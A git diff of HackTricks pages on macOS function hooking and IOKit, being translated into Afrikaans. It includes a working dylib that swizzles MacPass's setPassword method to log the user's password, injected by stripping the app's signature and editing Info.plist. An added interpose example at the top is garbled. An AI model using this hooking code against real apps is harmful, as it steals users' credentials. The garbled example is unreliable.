+typedef int (*interposed_open_type)(const char *pathname, int flags); + +// Define the interposed function +int interposed_open(const char *pathname, int flags) { + printf("Interposed open called with pathname: %s\n", pathname); + + // Get the address of the original function + orig_open_type orig_open = (orig_open_type)dlsym(RTLD_NEXT, "open"); + + // Call the original function + int result = orig_open(pathname, flags); + + return result; +} + +// Define the constructor function +__attribute__((constructor)) +void my_constructor() { + printf("Constructor called\n"); + + // Get the address of the interposed function + interposed_open_type interposed_open = (interposed_open_type)dlsym(RTLD_NEXT, "open"); + + // Get the address of the original function + orig_open_type orig_open = (orig_open_type)dlsym(RTLD_NEXT, "open"); + + // Call the interposed function + interposed_open("file.txt", 0); + + // Call the original function + orig_open("file.txt", 0); +} +``` + +This code demonstrates how to use function hooking in macOS using the `interpose` mechanism. The `interpose` mechanism allows you to intercept and replace function calls at runtime. + +In this example, we define an interposed function called `interposed_open` that will be called instead of the original `open` function. The `interposed_open` function simply prints the pathname argument and then calls the original `open` function. + +To use the `interpose` mechanism, we need to define a constructor function called `my_constructor`. The constructor function is automatically called when the shared library is loaded. In the constructor function, we get the addresses of both the interposed and original `open` functions using `dlsym`. We then call the interposed function to demonstrate that it is being called instead of the original function. Finally, we call the original function to show that we can still call it if needed. + +To compile and use this code, you can use the following commands: + +```bash +gcc -shared -o interpose.dylib interpose.c -ldl +DYLD_INSERT_LIBRARIES=./interpose.dylib ./program +``` + +Replace `program` with the name of the program you want to run with the interposed function. + +When you run the program, you should see the output from the interposed function followed by the output from the original function. + +This technique can be useful for various purposes, such as logging function calls, modifying function behavior, or implementing security measures. + +{% endtab %} ```c // Just another way to define an interpose // gcc -dynamiclib interpose2.c -o interpose2.dylib @@ -66,25 +128,24 @@ int main() { #include #define DYLD_INTERPOSE(_replacement, _replacee) \ - __attribute__((used)) static struct { \ - const void* replacement; \ - const void* replacee; \ - } _interpose_##_replacee __attribute__ ((section("__DATA, __interpose"))) = { \ - (const void*) (unsigned long) &_replacement, \ - (const void*) (unsigned long) &_replacee \ - }; +__attribute__((used)) static struct { \ +const void* replacement; \ +const void* replacee; \ +} _interpose_##_replacee __attribute__ ((section("__DATA, __interpose"))) = { \ +(const void*) (unsigned long) &_replacement, \ +(const void*) (unsigned long) &_replacee \ +}; int my_printf(const char *format, ...) { - int ret = printf("Hello from interpose\n"); - return ret; +int ret = printf("Hello from interpose\n"); +return ret; } DYLD_INTERPOSE(my_printf,printf); ``` {% endtab %} {% endtabs %} - ```bash DYLD_INSERT_LIBRARIES=./interpose.dylib ./hello Hello from interpose @@ -92,25 +153,23 @@ Hello from interpose DYLD_INSERT_LIBRARIES=./interpose2.dylib ./hello Hello from interpose ``` +## Metode Swizzling -## Method Swizzling +In ObjectiveC word 'n metode soos volg geroep: **`[myClassInstance nameOfTheMethodFirstParam:param1 secondParam:param2]`** -In ObjectiveC this is how a method is called like: **`[myClassInstance nameOfTheMethodFirstParam:param1 secondParam:param2]`** +Die **objek**, die **metode** en die **parameters** is nodig. En wanneer 'n metode geroep word, word 'n **boodskap gestuur** deur die gebruik van die funksie **`objc_msgSend`**: `int i = ((int (*)(id, SEL, NSString *, NSString *))objc_msgSend)(someObject, @selector(method1p1:p2:), value1, value2);` -It's needed the **object**, the **method** and the **params**. And when a method is called a **msg is sent** using the function **`objc_msgSend`**: `int i = ((int (*)(id, SEL, NSString *, NSString *))objc_msgSend)(someObject, @selector(method1p1:p2:), value1, value2);` +Die objek is **`someObject`**, die metode is **`@selector(method1p1:p2:)`** en die argumente is **value1**, **value2**. -The object is **`someObject`**, the method is **`@selector(method1p1:p2:)`** and the arguments are **value1**, **value2**. - -Following the object structures, it's possible to reach an **array of methods** where the **names** and **pointers** to the method code are **located**. +Deur die objekstrukture te volg, is dit moontlik om 'n **array van metodes** te bereik waar die **name** en **pointer** na die metodekode **geleë** is. {% hint style="danger" %} -Note that because methods and classes are accessed based on their names, this information is store in the binary, so it's possible to retrieve it with `otool -ov ` or [`class-dump `](https://github.com/nygard/class-dump) +Let daarop dat omdat metodes en klasse gebaseer word op hul name, hierdie inligting in die binêre lêer gestoor word, so dit is moontlik om dit te herwin met `otool -ov ` of [`class-dump `](https://github.com/nygard/class-dump) {% endhint %} -### Accessing the raw methods - -It's possible to access the information of the methods such as name, number of params or address like in the following example: +### Toegang tot die rou metodes +Dit is moontlik om die inligting van die metodes soos naam, aantal parameters of adres te bekom, soos in die volgende voorbeeld: ```objectivec // gcc -framework Foundation test.m -o test @@ -119,72 +178,70 @@ It's possible to access the information of the methods such as name, number of p #import int main() { - // Get class of the variable - NSString* str = @"This is an example"; - Class strClass = [str class]; - NSLog(@"str's Class name: %s", class_getName(strClass)); +// Get class of the variable +NSString* str = @"This is an example"; +Class strClass = [str class]; +NSLog(@"str's Class name: %s", class_getName(strClass)); - // Get parent class of a class - Class strSuper = class_getSuperclass(strClass); - NSLog(@"Superclass name: %@",NSStringFromClass(strSuper)); +// Get parent class of a class +Class strSuper = class_getSuperclass(strClass); +NSLog(@"Superclass name: %@",NSStringFromClass(strSuper)); - // Get information about a method - SEL sel = @selector(length); - NSLog(@"Selector name: %@", NSStringFromSelector(sel)); - Method m = class_getInstanceMethod(strClass,sel); - NSLog(@"Number of arguments: %d", method_getNumberOfArguments(m)); - NSLog(@"Implementation address: 0x%lx", (unsigned long)method_getImplementation(m)); +// Get information about a method +SEL sel = @selector(length); +NSLog(@"Selector name: %@", NSStringFromSelector(sel)); +Method m = class_getInstanceMethod(strClass,sel); +NSLog(@"Number of arguments: %d", method_getNumberOfArguments(m)); +NSLog(@"Implementation address: 0x%lx", (unsigned long)method_getImplementation(m)); - // Iterate through the class hierarchy - NSLog(@"Listing methods:"); - Class currentClass = strClass; - while (currentClass != NULL) { - unsigned int inheritedMethodCount = 0; - Method* inheritedMethods = class_copyMethodList(currentClass, &inheritedMethodCount); - - NSLog(@"Number of inherited methods in %s: %u", class_getName(currentClass), inheritedMethodCount); - - for (unsigned int i = 0; i < inheritedMethodCount; i++) { - Method method = inheritedMethods[i]; - SEL selector = method_getName(method); - const char* methodName = sel_getName(selector); - unsigned long address = (unsigned long)method_getImplementation(m); - NSLog(@"Inherited method name: %s (0x%lx)", methodName, address); - } - - // Free the memory allocated by class_copyMethodList - free(inheritedMethods); - currentClass = class_getSuperclass(currentClass); - } +// Iterate through the class hierarchy +NSLog(@"Listing methods:"); +Class currentClass = strClass; +while (currentClass != NULL) { +unsigned int inheritedMethodCount = 0; +Method* inheritedMethods = class_copyMethodList(currentClass, &inheritedMethodCount); - // Other ways to call uppercaseString method - if([str respondsToSelector:@selector(uppercaseString)]) { - NSString *uppercaseString = [str performSelector:@selector(uppercaseString)]; - NSLog(@"Uppercase string: %@", uppercaseString); - } +NSLog(@"Number of inherited methods in %s: %u", class_getName(currentClass), inheritedMethodCount); - // Using objc_msgSend directly - NSString *uppercaseString2 = ((NSString *(*)(id, SEL))objc_msgSend)(str, @selector(uppercaseString)); - NSLog(@"Uppercase string: %@", uppercaseString2); +for (unsigned int i = 0; i < inheritedMethodCount; i++) { +Method method = inheritedMethods[i]; +SEL selector = method_getName(method); +const char* methodName = sel_getName(selector); +unsigned long address = (unsigned long)method_getImplementation(m); +NSLog(@"Inherited method name: %s (0x%lx)", methodName, address); +} - // Calling the address directly - IMP imp = method_getImplementation(class_getInstanceMethod(strClass, @selector(uppercaseString))); // Get the function address - NSString *(*callImp)(id,SEL) = (typeof(callImp))imp; // Generates a function capable to method from imp - NSString *uppercaseString3 = callImp(str,@selector(uppercaseString)); // Call the method - NSLog(@"Uppercase string: %@", uppercaseString3); +// Free the memory allocated by class_copyMethodList +free(inheritedMethods); +currentClass = class_getSuperclass(currentClass); +} - return 0; +// Other ways to call uppercaseString method +if([str respondsToSelector:@selector(uppercaseString)]) { +NSString *uppercaseString = [str performSelector:@selector(uppercaseString)]; +NSLog(@"Uppercase string: %@", uppercaseString); +} + +// Using objc_msgSend directly +NSString *uppercaseString2 = ((NSString *(*)(id, SEL))objc_msgSend)(str, @selector(uppercaseString)); +NSLog(@"Uppercase string: %@", uppercaseString2); + +// Calling the address directly +IMP imp = method_getImplementation(class_getInstanceMethod(strClass, @selector(uppercaseString))); // Get the function address +NSString *(*callImp)(id,SEL) = (typeof(callImp))imp; // Generates a function capable to method from imp +NSString *uppercaseString3 = callImp(str,@selector(uppercaseString)); // Call the method +NSLog(@"Uppercase string: %@", uppercaseString3); + +return 0; } ``` +### Metode Swizzling met method\_exchangeImplementations -### Method Swizzling with method\_exchangeImplementations - -The function **`method_exchangeImplementations`** allows to **change** the **address** of the **implementation** of **one function for the other**. +Die funksie **`method_exchangeImplementations`** maak dit moontlik om die **adres** van die **implementering** van een funksie te **verander** na die ander. {% hint style="danger" %} -So when a function is called what is **executed is the other one**. +Dus, wanneer 'n funksie geroep word, word die ander een **uitgevoer**. {% endhint %} - ```objectivec //gcc -framework Foundation swizzle_str.m -o swizzle_str @@ -202,45 +259,43 @@ So when a function is called what is **executed is the other one**. @implementation NSString (SwizzleString) - (NSString *)swizzledSubstringFromIndex:(NSUInteger)from { - NSLog(@"Custom implementation of substringFromIndex:"); - - // Call the original method - return [self swizzledSubstringFromIndex:from]; +NSLog(@"Custom implementation of substringFromIndex:"); + +// Call the original method +return [self swizzledSubstringFromIndex:from]; } @end int main(int argc, const char * argv[]) { - // Perform method swizzling - Method originalMethod = class_getInstanceMethod([NSString class], @selector(substringFromIndex:)); - Method swizzledMethod = class_getInstanceMethod([NSString class], @selector(swizzledSubstringFromIndex:)); - method_exchangeImplementations(originalMethod, swizzledMethod); +// Perform method swizzling +Method originalMethod = class_getInstanceMethod([NSString class], @selector(substringFromIndex:)); +Method swizzledMethod = class_getInstanceMethod([NSString class], @selector(swizzledSubstringFromIndex:)); +method_exchangeImplementations(originalMethod, swizzledMethod); - // We changed the address of one method for the other - // Now when the method substringFromIndex is called, what is really called is swizzledSubstringFromIndex - // And when swizzledSubstringFromIndex is called, substringFromIndex is really colled - - // Example usage - NSString *myString = @"Hello, World!"; - NSString *subString = [myString substringFromIndex:7]; - NSLog(@"Substring: %@", subString); - - return 0; +// We changed the address of one method for the other +// Now when the method substringFromIndex is called, what is really called is swizzledSubstringFromIndex +// And when swizzledSubstringFromIndex is called, substringFromIndex is really colled + +// Example usage +NSString *myString = @"Hello, World!"; +NSString *subString = [myString substringFromIndex:7]; +NSLog(@"Substring: %@", subString); + +return 0; } ``` - {% hint style="warning" %} -In this case if the **implementation code of the legit** method **verifies** the **method** **name** it could **detect** this swizzling and prevent it from running. +In hierdie geval, as die **implementasie-kode van die regmatige** metode die **metode-naam** **verifieer**, kan dit hierdie swizzling opspoor en voorkom dat dit uitgevoer word. -The following technique doesn't have this restriction. +Die volgende tegniek het nie hierdie beperking nie. {% endhint %} -### Method Swizzling with method\_setImplementation +### Metode Swizzling met method\_setImplementation -The previous format is weird because you are changing the implementation of 2 methods one from the other. Using the function **`method_setImplementation`** you can **change** the **implementation** of a **method for the other one**. - -Just remember to **store the address of the implementation of the original one** if you are going to to call it from the new implementation before overwriting it because later it will be much complicated to locate that address. +Die vorige formaat is vreemd omdat jy die implementasie van 2 metodes verander, een van die ander. Deur die funksie **`method_setImplementation`** te gebruik, kan jy die implementasie van 'n metode **verander vir die ander**. +Onthou net om die adres van die implementasie van die oorspronklike een te **stoor** as jy dit van die nuwe implementasie gaan oproep voordat jy dit oorskryf, want later sal dit baie moeilik wees om daardie adres te vind. ```objectivec #import #import @@ -257,63 +312,60 @@ static IMP original_substringFromIndex = NULL; @implementation NSString (Swizzlestring) - (NSString *)swizzledSubstringFromIndex:(NSUInteger)from { - NSLog(@"Custom implementation of substringFromIndex:"); - - // Call the original implementation using objc_msgSendSuper - return ((NSString *(*)(id, SEL, NSUInteger))original_substringFromIndex)(self, _cmd, from); +NSLog(@"Custom implementation of substringFromIndex:"); + +// Call the original implementation using objc_msgSendSuper +return ((NSString *(*)(id, SEL, NSUInteger))original_substringFromIndex)(self, _cmd, from); } @end int main(int argc, const char * argv[]) { - @autoreleasepool { - // Get the class of the target method - Class stringClass = [NSString class]; - - // Get the swizzled and original methods - Method originalMethod = class_getInstanceMethod(stringClass, @selector(substringFromIndex:)); - - // Get the function pointer to the swizzled method's implementation - IMP swizzledIMP = method_getImplementation(class_getInstanceMethod(stringClass, @selector(swizzledSubstringFromIndex:))); - - // Swap the implementations - // It return the now overwritten implementation of the original method to store it - original_substringFromIndex = method_setImplementation(originalMethod, swizzledIMP); - - // Example usage - NSString *myString = @"Hello, World!"; - NSString *subString = [myString substringFromIndex:7]; - NSLog(@"Substring: %@", subString); - - // Set the original implementation back - method_setImplementation(originalMethod, original_substringFromIndex); - - return 0; - } +@autoreleasepool { +// Get the class of the target method +Class stringClass = [NSString class]; + +// Get the swizzled and original methods +Method originalMethod = class_getInstanceMethod(stringClass, @selector(substringFromIndex:)); + +// Get the function pointer to the swizzled method's implementation +IMP swizzledIMP = method_getImplementation(class_getInstanceMethod(stringClass, @selector(swizzledSubstringFromIndex:))); + +// Swap the implementations +// It return the now overwritten implementation of the original method to store it +original_substringFromIndex = method_setImplementation(originalMethod, swizzledIMP); + +// Example usage +NSString *myString = @"Hello, World!"; +NSString *subString = [myString substringFromIndex:7]; +NSLog(@"Substring: %@", subString); + +// Set the original implementation back +method_setImplementation(originalMethod, original_substringFromIndex); + +return 0; +} } ``` +## Hooking Aanval Metodologie -## Hooking Attack Methodology +Op hierdie bladsy is verskillende maniere bespreek om funksies te haker. Dit betrek egter **die uitvoering van kode binne die proses om aan te val**. -In this page different ways to hook functions were discussed. However, they involved **running code inside the process to attack**. +Om dit te doen, is die maklikste tegniek om 'n [Dyld via omgewingsveranderlikes of kaping](../macos-dyld-hijacking-and-dyld\_insert\_libraries.md) in te spuit. Ek vermoed egter dat dit ook gedoen kan word deur [Dylib-prosesinjeksie](macos-ipc-inter-process-communication/#dylib-process-injection-via-task-port). -In order to do that the easiest technique to use is to inject a [Dyld via environment variables or hijacking](../macos-dyld-hijacking-and-dyld\_insert\_libraries.md). However, I guess this could also be done via [Dylib process injection](macos-ipc-inter-process-communication/#dylib-process-injection-via-task-port). +Beide opsies is egter **beperk** tot **onbeskermde** binnerwerke/prosesse. Kyk na elke tegniek om meer te leer oor die beperkings. -However, both options are **limited** to **unprotected** binaries/processes. Check each technique to learn more about the limitations. - -However, a function hooking attack is very specific, an attacker will do this to **steal sensitive information from inside a process** (if not you would just do a process injection attack). And this sensitive information might be located in user downloaded Apps such as MacPass. - -So the attacker vector would be to either find a vulnerability or strip the signature of the application, inject the **`DYLD_INSERT_LIBRARIES`** env variable through the Info.plist of the application adding something like: +'n Funksie-hakeraanval is egter baie spesifiek, 'n aanvaller sal dit doen om **gevoelige inligting uit 'n proses te steel** (as jy nie dit sou doen nie, sou jy net 'n prosesinjeksie-aanval doen). En hierdie gevoelige inligting kan in gebruikers afgelaaide programme soos MacPass wees. +Die aanvaller se vektor sou dus wees om óf 'n kwesbaarheid te vind óf die handtekening van die toepassing te verwyder, die **`DYLD_INSERT_LIBRARIES`** omgewingsveranderlike deur die Info.plist van die toepassing in te spuit en iets soos die volgende by te voeg: ```xml LSEnvironment - DYLD_INSERT_LIBRARIES - /Applications/Application.app/Contents/malicious.dylib +DYLD_INSERT_LIBRARIES +/Applications/Application.app/Contents/malicious.dylib ``` - -and then **re-register** the application: +en registreer dan die toepassing **weer**: {% code overflow="wrap" %} ```bash @@ -321,14 +373,13 @@ and then **re-register** the application: ``` {% endcode %} -Add in that library the hooking code to exfiltrate the information: Passwords, messages... +Voeg in daardie biblioteek die hooking-kode by om die inligting uit te skakel: Wagwoorde, boodskappe... {% hint style="danger" %} -Note that in newer versions of macOS if you **strip the signature** of the application binary and it was previously executed, macOS **won't be executing the application** anymore. +Let daarop dat in nuwer weergawes van macOS, as jy die handtekening van die toepassingsbinêre lêer **verwyder** en dit voorheen uitgevoer is, sal macOS die toepassing **nie meer uitvoer nie**. {% endhint %} -#### Library example - +#### Biblioteekvoorbeeld ```objectivec // gcc -dynamiclib -framework Foundation sniff.m -o sniff.dylib @@ -345,40 +396,39 @@ static IMP real_setPassword = NULL; static BOOL custom_setPassword(id self, SEL _cmd, NSString* password, NSURL* keyFileURL) { - // Function that will log the password and call the original setPassword(pass, file_path) method - NSLog(@"[+] Password is: %@", password); - - // After logging the password call the original method so nothing breaks. - return ((BOOL (*)(id,SEL,NSString*, NSURL*))real_setPassword)(self, _cmd, password, keyFileURL); +// Function that will log the password and call the original setPassword(pass, file_path) method +NSLog(@"[+] Password is: %@", password); + +// After logging the password call the original method so nothing breaks. +return ((BOOL (*)(id,SEL,NSString*, NSURL*))real_setPassword)(self, _cmd, password, keyFileURL); } // Library constructor to execute __attribute__((constructor)) static void customConstructor(int argc, const char **argv) { - // Get the real method address to not lose it - Class classMPDocument = NSClassFromString(@"MPDocument"); - Method real_Method = class_getInstanceMethod(classMPDocument, @selector(setPassword:keyFileURL:)); - - // Make the original method setPassword call the fake implementation one - IMP fake_IMP = (IMP)custom_setPassword; - real_setPassword = method_setImplementation(real_Method, fake_IMP); +// Get the real method address to not lose it +Class classMPDocument = NSClassFromString(@"MPDocument"); +Method real_Method = class_getInstanceMethod(classMPDocument, @selector(setPassword:keyFileURL:)); + +// Make the original method setPassword call the fake implementation one +IMP fake_IMP = (IMP)custom_setPassword; +real_setPassword = method_setImplementation(real_Method, fake_IMP); } ``` - -## References +## Verwysings * [https://nshipster.com/method-swizzling/](https://nshipster.com/method-swizzling/)
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFT's**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hack-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
diff --git a/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-iokit.md b/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-iokit.md index 38ef0db2e..5d399a231 100644 --- a/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-iokit.md +++ b/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-iokit.md @@ -2,28 +2,27 @@
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -* ¿Trabajas en una **empresa de ciberseguridad**? ¿Quieres ver tu **empresa anunciada en HackTricks**? ¿O quieres tener acceso a la **última versión de PEASS o descargar HackTricks en PDF**? ¡Consulta los [**PLANES DE SUSCRIPCIÓN**](https://github.com/sponsors/carlospolop)! -* Descubre [**The PEASS Family**](https://opensea.io/collection/the-peass-family), nuestra colección exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family) -* Obtén el [**swag oficial de PEASS y HackTricks**](https://peass.creator-spring.com) -* **Únete al** [**💬**](https://emojipedia.org/speech-balloon/) **grupo de Discord** o al [**grupo de telegram**](https://t.me/peass) o **sígueme** en **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks\_live). -* **Comparte tus trucos de hacking enviando PR a** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **y** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud). +* Werk jy vir 'n **cybersecurity-maatskappy**? Wil jy jou **maatskappy adverteer op HackTricks**? Of wil jy toegang hê tot die **nuutste weergawe van PEASS of HackTricks aflaai in PDF-formaat**? Kyk na die [**SUBSKRIPSIEPLANNE**](https://github.com/sponsors/carlospolop)! +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons eksklusiewe versameling van [**NFTs**](https://opensea.io/collection/the-peass-family) +* Kry die [**amptelike PEASS en HackTricks swag**](https://peass.creator-spring.com) +* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) **Discord-groep** of die [**telegram-groep**](https://t.me/peass) of **volg my** op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks\_live). +* **Deel jou hacking-truuks deur 'n PR te stuur na** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **en** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
-## Basic Information +## Basiese Inligting -The I/O Kit is an open-source, object-oriented **device-driver framework** in the XNU kernel, handles **dynamically loaded device drivers**. It allows modular code to be added to the kernel on-the-fly, supporting diverse hardware. +Die I/O Kit is 'n oopbron, objek-georiënteerde **toestuurder-raamwerk** in die XNU-kernel, wat **dinamies gelaai word toestuurders** hanteer. Dit maak dit moontlik om modulêre kode op die vlieg by die kernel te voeg, wat diverse hardeware ondersteun. -IOKit drivers will basically **export functions from the kernel**. These function parameter **types** are **predefined** and are verified. Moreover, similar to XPC, IOKit is just another layer on **top of Mach messages**. +IOKit-bestuurders sal basies **funksies uit die kernel uitvoer**. Hierdie funksieparameter **tipes** is **voorgedefinieer** en word geverifieer. Verder, soos XPC, is IOKit net nog 'n laag **bo-op Mach-boodskappe**. -**IOKit XNU kernel code** is opensourced by Apple in [https://github.com/apple-oss-distributions/xnu/tree/main/iokit](https://github.com/apple-oss-distributions/xnu/tree/main/iokit). Moreover, the user space IOKit components are also opensource [https://github.com/opensource-apple/IOKitUser](https://github.com/opensource-apple/IOKitUser). +Die **IOKit XNU-kernelkode** is deur Apple oopbron in [https://github.com/apple-oss-distributions/xnu/tree/main/iokit](https://github.com/apple-oss-distributions/xnu/tree/main/iokit). Verder is die IOKit-komponente vir gebruikersruimte ook oopbron [https://github.com/opensource-apple/IOKitUser](https://github.com/opensource-apple/IOKitUser). -However, **no IOKit drivers** are opensource. Anyway, from time to time a release of a driver might come with symbols that makes it easier to debug it. Check how to [**get the driver extensions from the firmware here**](./#ipsw)**.** - -It's written in **C++**. You can get demangled C++ symbols with: +Nietemin, **geen IOKit-bestuurders** is oopbron nie. In elk geval kan 'n vrystelling van 'n bestuurder van tyd tot tyd met simbole kom wat dit makliker maak om dit te foutopspoor. Kyk hoe om [**die bestuurderuitbreidings uit die firmware te kry hier**](./#ipsw)**.** +Dit is in **C++** geskryf. Jy kan gedemangelde C++-simbole kry met: ```bash # Get demangled symbols nm -C com.apple.driver.AppleJPEGDriver @@ -33,159 +32,148 @@ c++filt __ZN16IOUserClient202222dispatchExternalMethodEjP31IOExternalMethodArgumentsOpaquePK28IOExternalMethodDispatch2022mP8OSObjectPv IOUserClient2022::dispatchExternalMethod(unsigned int, IOExternalMethodArgumentsOpaque*, IOExternalMethodDispatch2022 const*, unsigned long, OSObject*, void*) ``` - {% hint style="danger" %} -IOKit **exposed functions** could perform **additional security checks** when a client tries to call a function but note that the apps are usually **limited** by the **sandbox** to which IOKit functions they can interact with. +IOKit **blootgestelde funksies** kan **addisionele sekuriteitskontroles** uitvoer wanneer 'n kliënt probeer om 'n funksie aan te roep, maar let daarop dat die programme gewoonlik **beperk** word deur die **sandbox** waarmee IOKit funksies kan interaksie hê. {% endhint %} -## Drivers +## Bestuurders -In macOS they are located in: +In macOS is hulle geleë in: * **`/System/Library/Extensions`** - * KEXT files built into the OS X operating system. +* KEXT-lêers wat in die OS X-bedryfstelsel ingebou is. * **`/Library/Extensions`** - * KEXT files installed by 3rd party software +* KEXT-lêers wat deur derdeparty sagteware geïnstalleer is. -In iOS they are located in: +In iOS is hulle geleë in: * **`/System/Library/Extensions`** - ```bash #Use kextstat to print the loaded drivers kextstat Executing: /usr/bin/kmutil showloaded No variant specified, falling back to release Index Refs Address Size Wired Name (Version) UUID - 1 142 0 0 0 com.apple.kpi.bsd (20.5.0) 52A1E876-863E-38E3-AC80-09BBAB13B752 <> - 2 11 0 0 0 com.apple.kpi.dsep (20.5.0) 52A1E876-863E-38E3-AC80-09BBAB13B752 <> - 3 170 0 0 0 com.apple.kpi.iokit (20.5.0) 52A1E876-863E-38E3-AC80-09BBAB13B752 <> - 4 0 0 0 0 com.apple.kpi.kasan (20.5.0) 52A1E876-863E-38E3-AC80-09BBAB13B752 <> - 5 175 0 0 0 com.apple.kpi.libkern (20.5.0) 52A1E876-863E-38E3-AC80-09BBAB13B752 <> - 6 154 0 0 0 com.apple.kpi.mach (20.5.0) 52A1E876-863E-38E3-AC80-09BBAB13B752 <> - 7 88 0 0 0 com.apple.kpi.private (20.5.0) 52A1E876-863E-38E3-AC80-09BBAB13B752 <> - 8 106 0 0 0 com.apple.kpi.unsupported (20.5.0) 52A1E876-863E-38E3-AC80-09BBAB13B752 <> - 9 2 0xffffff8003317000 0xe000 0xe000 com.apple.kec.Libm (1) 6C1342CC-1D74-3D0F-BC43-97D5AD38200A <5> - 10 12 0xffffff8003544000 0x92000 0x92000 com.apple.kec.corecrypto (11.1) F5F1255F-6552-3CF4-A9DB-D60EFDEB4A9A <8 7 6 5 3 1> +1 142 0 0 0 com.apple.kpi.bsd (20.5.0) 52A1E876-863E-38E3-AC80-09BBAB13B752 <> +2 11 0 0 0 com.apple.kpi.dsep (20.5.0) 52A1E876-863E-38E3-AC80-09BBAB13B752 <> +3 170 0 0 0 com.apple.kpi.iokit (20.5.0) 52A1E876-863E-38E3-AC80-09BBAB13B752 <> +4 0 0 0 0 com.apple.kpi.kasan (20.5.0) 52A1E876-863E-38E3-AC80-09BBAB13B752 <> +5 175 0 0 0 com.apple.kpi.libkern (20.5.0) 52A1E876-863E-38E3-AC80-09BBAB13B752 <> +6 154 0 0 0 com.apple.kpi.mach (20.5.0) 52A1E876-863E-38E3-AC80-09BBAB13B752 <> +7 88 0 0 0 com.apple.kpi.private (20.5.0) 52A1E876-863E-38E3-AC80-09BBAB13B752 <> +8 106 0 0 0 com.apple.kpi.unsupported (20.5.0) 52A1E876-863E-38E3-AC80-09BBAB13B752 <> +9 2 0xffffff8003317000 0xe000 0xe000 com.apple.kec.Libm (1) 6C1342CC-1D74-3D0F-BC43-97D5AD38200A <5> +10 12 0xffffff8003544000 0x92000 0x92000 com.apple.kec.corecrypto (11.1) F5F1255F-6552-3CF4-A9DB-D60EFDEB4A9A <8 7 6 5 3 1> ``` +Tot by nommer 9 word die gelysde drywers **gelaai in die adres 0**. Dit beteken dat dit nie werklike drywers is nie, maar **deel van die kernel en hulle kan nie gelaai word nie**. -Until the number 9 the listed drivers are **loaded in the address 0**. This means that those aren't real drivers but **part of the kernel and they cannot be unloaded**. - -In order to find specific extensions you can use: - +Om spesifieke uitbreidings te vind, kan jy gebruik maak van: ```bash kextfind -bundle-id com.apple.iokit.IOReportFamily #Search by full bundle-id kextfind -bundle-id -substring IOR #Search by substring in bundle-id ``` - -To load and unload kernel extensions do: - +Om kernel-uitbreidings te laai en te ontlas, doen die volgende: ```bash kextload com.apple.iokit.IOReportFamily kextunload com.apple.iokit.IOReportFamily ``` - ## IORegistry -The **IORegistry** is a crucial part of the IOKit framework in macOS and iOS which serves as a database for representing the system's hardware configuration and state. It's a **hierarchical collection of objects that represent all the hardware and drivers** loaded on the system, and their relationships to each other. - -You can get the IORegistry using the cli **`ioreg`** to inspect it from the console (specially useful for iOS). +Die **IORegistry** is 'n belangrike deel van die IOKit-raamwerk in macOS en iOS wat dien as 'n databasis vir die voorstelling van die stelsel se hardewarekonfigurasie en -toestand. Dit is 'n **hiërargiese versameling van voorwerpe wat al die hardeware en drywers verteenwoordig** wat op die stelsel gelaai is, en hul verhoudings met mekaar. +Jy kan die IORegistry kry deur die opdrag **`ioreg`** te gebruik om dit vanaf die konsole te ondersoek (veral nuttig vir iOS). ```bash ioreg -l #List all ioreg -w 0 #Not cut lines ioreg -p #Check other plane ``` - -You could download **`IORegistryExplorer`** from **Xcode Additional Tools** from [**https://developer.apple.com/download/all/**](https://developer.apple.com/download/all/) and inspect the **macOS IORegistry** through a **graphical** interface. +Jy kan **`IORegistryExplorer`** aflaai vanaf **Xcode Additional Tools** by [**https://developer.apple.com/download/all/**](https://developer.apple.com/download/all/) en die **macOS IORegistry** deur middel van 'n **grafiese** koppelvlak ondersoek.
